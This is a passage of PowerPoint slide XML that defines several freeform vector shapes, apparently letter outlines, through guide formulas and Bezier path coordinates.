                    <a:gd name="connsiteX19" fmla="*/ 82486 w 142875"/>
                    <a:gd name="connsiteY19" fmla="*/ 43148 h 95250"/>
                    <a:gd name="connsiteX20" fmla="*/ 82486 w 142875"/>
                    <a:gd name="connsiteY20" fmla="*/ 96203 h 95250"/>
                    <a:gd name="connsiteX21" fmla="*/ 60769 w 142875"/>
                    <a:gd name="connsiteY21" fmla="*/ 96203 h 95250"/>
                    <a:gd name="connsiteX22" fmla="*/ 60769 w 142875"/>
                    <a:gd name="connsiteY22" fmla="*/ 42672 h 95250"/>
                    <a:gd name="connsiteX23" fmla="*/ 55817 w 142875"/>
                    <a:gd name="connsiteY23" fmla="*/ 25813 h 95250"/>
                    <a:gd name="connsiteX24" fmla="*/ 41815 w 142875"/>
                    <a:gd name="connsiteY24" fmla="*/ 19907 h 95250"/>
                    <a:gd name="connsiteX25" fmla="*/ 27242 w 142875"/>
                    <a:gd name="connsiteY25" fmla="*/ 26098 h 95250"/>
                    <a:gd name="connsiteX26" fmla="*/ 21717 w 142875"/>
                    <a:gd name="connsiteY26" fmla="*/ 43339 h 95250"/>
                    <a:gd name="connsiteX27" fmla="*/ 21717 w 142875"/>
                    <a:gd name="connsiteY27" fmla="*/ 96203 h 95250"/>
                    <a:gd name="connsiteX28" fmla="*/ 0 w 142875"/>
                    <a:gd name="connsiteY28" fmla="*/ 96203 h 95250"/>
                    <a:gd name="connsiteX29" fmla="*/ 0 w 142875"/>
                    <a:gd name="connsiteY29" fmla="*/ 2000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42875" h="95250">
                      <a:moveTo>
                        <a:pt x="0" y="2000"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21717" y="2000"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21717" y="16383"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="23241" y="14192"/>
                        <a:pt x="24956" y="12192"/>
                        <a:pt x="26670" y="10287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28480" y="8382"/>
                        <a:pt x="30480" y="6667"/>
                        <a:pt x="32766" y="5048"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35052" y="3524"/>
                        <a:pt x="37719" y="2286"/>
                        <a:pt x="40577" y="1333"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43434" y="476"/>
                        <a:pt x="46673" y="0"/>
                        <a:pt x="50292" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57055" y="0"/>
                        <a:pt x="62770" y="1524"/>
                        <a:pt x="67437" y="4572"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72104" y="7620"/>
                        <a:pt x="75724" y="11716"/>
                        <a:pt x="78200" y="16669"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82010" y="11621"/>
                        <a:pt x="86487" y="7620"/>
                        <a:pt x="91726" y="4572"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="96965" y="1524"/>
                        <a:pt x="103061" y="0"/>
                        <a:pt x="110204" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120586" y="0"/>
                        <a:pt x="128683" y="3143"/>
                        <a:pt x="134493" y="9334"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140303" y="15621"/>
                        <a:pt x="143256" y="24479"/>
                        <a:pt x="143256" y="36004"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="143256" y="96107"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121539" y="96107"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121539" y="42767"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="121539" y="35338"/>
                        <a:pt x="119920" y="29623"/>
                        <a:pt x="116586" y="25717"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113252" y="21812"/>
                        <a:pt x="108585" y="19812"/>
                        <a:pt x="102584" y="19812"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="96679" y="19812"/>
                        <a:pt x="91821" y="21812"/>
                        <a:pt x="88106" y="25813"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84391" y="29813"/>
                        <a:pt x="82486" y="35528"/>
                        <a:pt x="82486" y="43148"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="82486" y="96203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60769" y="96203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60769" y="42672"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="60769" y="35338"/>
                        <a:pt x="59150" y="29718"/>
                        <a:pt x="55817" y="25813"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52483" y="21908"/>
                        <a:pt x="47815" y="19907"/>
                        <a:pt x="41815" y="19907"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35814" y="19907"/>
                        <a:pt x="30956" y="22003"/>
                        <a:pt x="27242" y="26098"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23527" y="30290"/>
                        <a:pt x="21717" y="36004"/>
                        <a:pt x="21717" y="43339"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21717" y="96203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="96203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="200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93" name="자유형: 도형 351">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0564A03-4DF5-6443-8E56-4A7E279F6C51}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3718091" y="3966774"/>
                  <a:ext cx="95250" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 50006 w 95250"/>
                    <a:gd name="connsiteY0" fmla="*/ 98203 h 95250"/>
                    <a:gd name="connsiteX1" fmla="*/ 30099 w 95250"/>
                    <a:gd name="connsiteY1" fmla="*/ 94393 h 95250"/>
                    <a:gd name="connsiteX2" fmla="*/ 14192 w 95250"/>
                    <a:gd name="connsiteY2" fmla="*/ 83915 h 95250"/>
                    <a:gd name="connsiteX3" fmla="*/ 3715 w 95250"/>
                    <a:gd name="connsiteY3" fmla="*/ 68390 h 95250"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY4" fmla="*/ 49530 h 95250"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY5" fmla="*/ 49149 h 95250"/>
                    <a:gd name="connsiteX6" fmla="*/ 3810 w 95250"/>
                    <a:gd name="connsiteY6" fmla="*/ 30099 h 95250"/>
                    <a:gd name="connsiteX7" fmla="*/ 14288 w 95250"/>
                    <a:gd name="connsiteY7" fmla="*/ 14478 h 95250"/>
                    <a:gd name="connsiteX8" fmla="*/ 30194 w 95250"/>
                    <a:gd name="connsiteY8" fmla="*/ 3905 h 95250"/>
                    <a:gd name="connsiteX9" fmla="*/ 50292 w 95250"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX10" fmla="*/ 70390 w 95250"/>
                    <a:gd name="connsiteY10" fmla="*/ 3810 h 95250"/>
                    <a:gd name="connsiteX11" fmla="*/ 86296 w 95250"/>
                    <a:gd name="connsiteY11" fmla="*/ 14288 h 95250"/>
                    <a:gd name="connsiteX12" fmla="*/ 96774 w 95250"/>
                    <a:gd name="connsiteY12" fmla="*/ 29813 h 95250"/>
                    <a:gd name="connsiteX13" fmla="*/ 100489 w 95250"/>
                    <a:gd name="connsiteY13" fmla="*/ 48768 h 95250"/>
                    <a:gd name="connsiteX14" fmla="*/ 100489 w 95250"/>
                    <a:gd name="connsiteY14" fmla="*/ 49149 h 95250"/>
                    <a:gd name="connsiteX15" fmla="*/ 96679 w 95250"/>
                    <a:gd name="connsiteY15" fmla="*/ 68008 h 95250"/>
                    <a:gd name="connsiteX16" fmla="*/ 86201 w 95250"/>
                    <a:gd name="connsiteY16" fmla="*/ 83629 h 95250"/>
                    <a:gd name="connsiteX17" fmla="*/ 70199 w 95250"/>
                    <a:gd name="connsiteY17" fmla="*/ 94202 h 95250"/>
                    <a:gd name="connsiteX18" fmla="*/ 50006 w 95250"/>
                    <a:gd name="connsiteY18" fmla="*/ 98203 h 95250"/>
                    <a:gd name="connsiteX19" fmla="*/ 50292 w 95250"/>
                    <a:gd name="connsiteY19" fmla="*/ 79534 h 95250"/>
                    <a:gd name="connsiteX20" fmla="*/ 62103 w 95250"/>
                    <a:gd name="connsiteY20" fmla="*/ 77153 h 95250"/>
                    <a:gd name="connsiteX21" fmla="*/ 71057 w 95250"/>
                    <a:gd name="connsiteY21" fmla="*/ 70676 h 95250"/>
                    <a:gd name="connsiteX22" fmla="*/ 76771 w 95250"/>
                    <a:gd name="connsiteY22" fmla="*/ 61151 h 95250"/>
                    <a:gd name="connsiteX23" fmla="*/ 78772 w 95250"/>
                    <a:gd name="connsiteY23" fmla="*/ 49625 h 95250"/>
                    <a:gd name="connsiteX24" fmla="*/ 78772 w 95250"/>
                    <a:gd name="connsiteY24" fmla="*/ 49244 h 95250"/>
                    <a:gd name="connsiteX25" fmla="*/ 76676 w 95250"/>
                    <a:gd name="connsiteY25" fmla="*/ 37433 h 95250"/>
                    <a:gd name="connsiteX26" fmla="*/ 70771 w 95250"/>
                    <a:gd name="connsiteY26" fmla="*/ 27813 h 95250"/>
                    <a:gd name="connsiteX27" fmla="*/ 61722 w 95250"/>
                    <a:gd name="connsiteY27" fmla="*/ 21336 h 95250"/>
                    <a:gd name="connsiteX28" fmla="*/ 50101 w 95250"/>
                    <a:gd name="connsiteY28" fmla="*/ 18955 h 95250"/>
                    <a:gd name="connsiteX29" fmla="*/ 38481 w 95250"/>
                    <a:gd name="connsiteY29" fmla="*/ 21336 h 95250"/>
                    <a:gd name="connsiteX30" fmla="*/ 29528 w 95250"/>
                    <a:gd name="connsiteY30" fmla="*/ 27718 h 95250"/>
                    <a:gd name="connsiteX31" fmla="*/ 23813 w 95250"/>
                    <a:gd name="connsiteY31" fmla="*/ 37243 h 95250"/>
                    <a:gd name="connsiteX32" fmla="*/ 21908 w 95250"/>
                    <a:gd name="connsiteY32" fmla="*/ 48863 h 95250"/>
                    <a:gd name="connsiteX33" fmla="*/ 21908 w 95250"/>
                    <a:gd name="connsiteY33" fmla="*/ 49244 h 95250"/>
                    <a:gd name="connsiteX34" fmla="*/ 24003 w 95250"/>
                    <a:gd name="connsiteY34" fmla="*/ 60960 h 95250"/>
                    <a:gd name="connsiteX35" fmla="*/ 29908 w 95250"/>
                    <a:gd name="connsiteY35" fmla="*/ 70580 h 95250"/>
                    <a:gd name="connsiteX36" fmla="*/ 38957 w 95250"/>
                    <a:gd name="connsiteY36" fmla="*/ 77153 h 95250"/>
                    <a:gd name="connsiteX37" fmla="*/ 50292 w 95250"/>
                    <a:gd name="connsiteY37" fmla="*/ 79534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95250" h="95250">
                      <a:moveTo>
                        <a:pt x="50006" y="98203"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="42863" y="98203"/>
                        <a:pt x="36290" y="96965"/>
                        <a:pt x="30099" y="94393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24003" y="91821"/>
                        <a:pt x="18669" y="88392"/>
                        <a:pt x="14192" y="83915"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9716" y="79534"/>
                        <a:pt x="6287" y="74390"/>
                        <a:pt x="3715" y="68390"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1238" y="62484"/>
                        <a:pt x="0" y="56102"/>
                        <a:pt x="0" y="49530"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="49149"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="42386"/>
                        <a:pt x="1238" y="36004"/>
                        <a:pt x="3810" y="30099"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="24194"/>
                        <a:pt x="9906" y="18955"/>
                        <a:pt x="14288" y="14478"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18764" y="10001"/>
                        <a:pt x="24003" y="6477"/>
                        <a:pt x="30194" y="3905"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36290" y="1333"/>
                        <a:pt x="42958" y="0"/>
                        <a:pt x="50292" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57626" y="0"/>
                        <a:pt x="64199" y="1238"/>
                        <a:pt x="70390" y="3810"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76486" y="6382"/>
                        <a:pt x="81820" y="9906"/>
                        <a:pt x="86296" y="14288"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90773" y="18764"/>
                        <a:pt x="94202" y="23908"/>
                        <a:pt x="96774" y="29813"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="99346" y="35719"/>
                        <a:pt x="100489" y="42005"/>
                        <a:pt x="100489" y="48768"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="100489" y="49149"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="100489" y="55816"/>
                        <a:pt x="99250" y="62103"/>
                        <a:pt x="96679" y="68008"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="94107" y="73914"/>
                        <a:pt x="90583" y="79153"/>
                        <a:pt x="86201" y="83629"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81725" y="88106"/>
                        <a:pt x="76391" y="91630"/>
                        <a:pt x="70199" y="94202"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64008" y="96774"/>
                        <a:pt x="57245" y="98203"/>
                        <a:pt x="50006" y="98203"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="50292" y="79534"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="54674" y="79534"/>
                        <a:pt x="58579" y="78772"/>
                        <a:pt x="62103" y="77153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65627" y="75533"/>
                        <a:pt x="68580" y="73342"/>
                        <a:pt x="71057" y="70676"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73533" y="68008"/>
                        <a:pt x="75438" y="64770"/>
                        <a:pt x="76771" y="61151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78105" y="57531"/>
                        <a:pt x="78772" y="53721"/>
                        <a:pt x="78772" y="49625"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="78772" y="49244"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="78772" y="45053"/>
                        <a:pt x="78105" y="41148"/>
                        <a:pt x="76676" y="37433"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75247" y="33719"/>
                        <a:pt x="73247" y="30575"/>
                        <a:pt x="70771" y="27813"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68199" y="25051"/>
                        <a:pt x="65246" y="22955"/>
                        <a:pt x="61722" y="21336"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58198" y="19717"/>
                        <a:pt x="54388" y="18955"/>
                        <a:pt x="50101" y="18955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45815" y="18955"/>
                        <a:pt x="42005" y="19717"/>
                        <a:pt x="38481" y="21336"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34957" y="22955"/>
                        <a:pt x="32004" y="25051"/>
                        <a:pt x="29528" y="27718"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27051" y="30385"/>
                        <a:pt x="25146" y="33528"/>
                        <a:pt x="23813" y="37243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22479" y="40957"/>
                        <a:pt x="21908" y="44768"/>
                        <a:pt x="21908" y="48863"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21908" y="49244"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21908" y="53435"/>
                        <a:pt x="22574" y="57341"/>
                        <a:pt x="24003" y="60960"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25432" y="64579"/>
                        <a:pt x="27432" y="67818"/>
                        <a:pt x="29908" y="70580"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32480" y="73342"/>
                        <a:pt x="35433" y="75533"/>
                        <a:pt x="38957" y="77153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42386" y="78677"/>
                        <a:pt x="46196" y="79534"/>
                        <a:pt x="50292" y="79534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94" name="자유형: 도형 352">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337FE694-98D2-5C4D-B6A4-A6CF5FA8353E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3832963" y="3942866"/>
                  <a:ext cx="57150" cy="114300"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 39243 w 57150"/>
                    <a:gd name="connsiteY0" fmla="*/ 121634 h 114300"/>
                    <a:gd name="connsiteX1" fmla="*/ 28289 w 57150"/>
                    <a:gd name="connsiteY1" fmla="*/ 120205 h 114300"/>
                    <a:gd name="connsiteX2" fmla="*/ 19526 w 57150"/>
                    <a:gd name="connsiteY2" fmla="*/ 115538 h 114300"/>
                    <a:gd name="connsiteX3" fmla="*/ 13907 w 57150"/>
                    <a:gd name="connsiteY3" fmla="*/ 107061 h 114300"/>
                    <a:gd name="connsiteX4" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY4" fmla="*/ 93917 h 114300"/>
                    <a:gd name="connsiteX5" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY5" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX6" fmla="*/ 0 w 57150"/>
                    <a:gd name="connsiteY6" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 57150"/>
                    <a:gd name="connsiteY7" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX8" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY8" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX9" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 114300"/>
                    <a:gd name="connsiteX10" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 114300"/>
                    <a:gd name="connsiteX11" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY11" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX12" fmla="*/ 58960 w 57150"/>
                    <a:gd name="connsiteY12" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX13" fmla="*/ 58960 w 57150"/>
                    <a:gd name="connsiteY13" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX14" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY14" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX15" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY15" fmla="*/ 90583 h 114300"/>
                    <a:gd name="connsiteX16" fmla="*/ 36671 w 57150"/>
                    <a:gd name="connsiteY16" fmla="*/ 99631 h 114300"/>
                    <a:gd name="connsiteX17" fmla="*/ 45244 w 57150"/>
                    <a:gd name="connsiteY17" fmla="*/ 102394 h 114300"/>
                    <a:gd name="connsiteX18" fmla="*/ 58579 w 57150"/>
                    <a:gd name="connsiteY18" fmla="*/ 99155 h 114300"/>
                    <a:gd name="connsiteX19" fmla="*/ 58579 w 57150"/>
                    <a:gd name="connsiteY19" fmla="*/ 116777 h 114300"/>
                    <a:gd name="connsiteX20" fmla="*/ 49816 w 57150"/>
                    <a:gd name="connsiteY20" fmla="*/ 120301 h 114300"/>
                    <a:gd name="connsiteX21" fmla="*/ 39243 w 57150"/>
                    <a:gd name="connsiteY21" fmla="*/ 121634 h 114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7150" h="114300">
                      <a:moveTo>
                        <a:pt x="39243" y="121634"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35338" y="121634"/>
                        <a:pt x="31718" y="121158"/>
                        <a:pt x="28289" y="120205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24956" y="119253"/>
                        <a:pt x="22003" y="117729"/>
                        <a:pt x="19526" y="115538"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17050" y="113443"/>
                        <a:pt x="15145" y="110585"/>
                        <a:pt x="13907" y="107061"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12573" y="103537"/>
                        <a:pt x="11906" y="99155"/>
                        <a:pt x="11906" y="93917"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11906" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11906" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11906" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58960" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58960" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="90583"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="33623" y="94774"/>
                        <a:pt x="34671" y="97727"/>
                        <a:pt x="36671" y="99631"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38671" y="101441"/>
                        <a:pt x="41529" y="102394"/>
                        <a:pt x="45244" y="102394"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49911" y="102394"/>
                        <a:pt x="54388" y="101346"/>
                        <a:pt x="58579" y="99155"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="58579" y="116777"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="55817" y="118301"/>
                        <a:pt x="52959" y="119539"/>
                        <a:pt x="49816" y="120301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46863" y="121158"/>
                        <a:pt x="43244" y="121634"/>
                        <a:pt x="39243" y="121634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95" name="자유형: 도형 353">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2631B5BA-BE88-394A-94FF-66163E6F44EC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3913925" y="3933722"/>
                  <a:ext cx="19050" cy="123825"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX1" fmla="*/ 23336 w 19050"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX2" fmla="*/ 23336 w 19050"/>
                    <a:gd name="connsiteY2" fmla="*/ 20479 h 123825"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY3" fmla="*/ 20479 h 123825"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX5" fmla="*/ 857 w 19050"/>
                    <a:gd name="connsiteY5" fmla="*/ 34957 h 123825"/>
                    <a:gd name="connsiteX6" fmla="*/ 22574 w 19050"/>
                    <a:gd name="connsiteY6" fmla="*/ 34957 h 123825"/>
                    <a:gd name="connsiteX7" fmla="*/ 22574 w 19050"/>
                    <a:gd name="connsiteY7" fmla="*/ 129064 h 123825"/>
                    <a:gd name="connsiteX8" fmla="*/ 857 w 19050"/>
                    <a:gd name="connsiteY8" fmla="*/ 129064 h 123825"/>
                    <a:gd name="connsiteX9" fmla="*/ 857 w 19050"/>
                    <a:gd name="connsiteY9" fmla="*/ 34957 h 1238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9050" h="123825">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23336" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23336" y="20479"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="20479"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="857" y="34957"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="22574" y="34957"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22574" y="129064"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="857" y="129064"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="857" y="34957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96" name="자유형: 도형 354">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B63F03-200A-C740-946E-BAC664409457}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3955645" y="3968679"/>
                  <a:ext cx="95250" cy="85725"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 85725"/>
                    <a:gd name="connsiteX1" fmla="*/ 23146 w 95250"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 85725"/>
                    <a:gd name="connsiteX2" fmla="*/ 48482 w 95250"/>
                    <a:gd name="connsiteY2" fmla="*/ 69151 h 85725"/>
                    <a:gd name="connsiteX3" fmla="*/ 74009 w 95250"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 85725"/>
                    <a:gd name="connsiteX4" fmla="*/ 96679 w 95250"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 85725"/>
                    <a:gd name="connsiteX5" fmla="*/ 58198 w 95250"/>
                    <a:gd name="connsiteY5" fmla="*/ 94869 h 85725"/>
                    <a:gd name="connsiteX6" fmla="*/ 38767 w 95250"/>
                    <a:gd name="connsiteY6" fmla="*/ 94869 h 85725"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 8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5250" h="85725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23146" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48482" y="69151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74009" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96679" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58198" y="94869"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38767" y="9486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297" name="자유형: 도형 355">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E20D2A4E-7A91-E346-BBE3-B081C5A34BAE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4065468" y="3966869"/>
                  <a:ext cx="85725" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 48387 w 85725"/>
                    <a:gd name="connsiteY0" fmla="*/ 98108 h 95250"/>
